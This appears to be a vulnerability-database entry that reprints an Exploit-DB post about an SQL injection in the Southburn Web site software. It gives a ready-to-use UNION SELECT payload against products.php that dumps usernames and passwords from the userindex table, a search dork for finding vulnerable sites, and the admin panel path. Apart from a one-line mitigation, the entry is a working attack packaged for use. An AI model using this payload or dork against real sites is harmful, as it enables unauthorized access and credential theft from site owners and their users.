Southburn Web SQL Injection Vulnerability

vendor:

Southburn Web

by:

AtT4CKxT3rR0r1ST

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Southburn Web

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Southburn Web SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in Southburn Web to gain access to the userindex table and extract the usernames and passwords of all users. The exploit is achieved by appending '+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+userindex-- -' to the vulnerable URL.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : southburn Web [http://southburn.ca/]
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "Powered by: Southburn"

####################################################################

===[ Exploit ]===

www.site.com/products.php?id=null[Sql]&r=null

www.site.com/products.php?id=null'+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+userindex-- -&r=null

Exploit:

'+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+userindex-- -

Path admin:

www.site.com/admin/index.php
####################################################################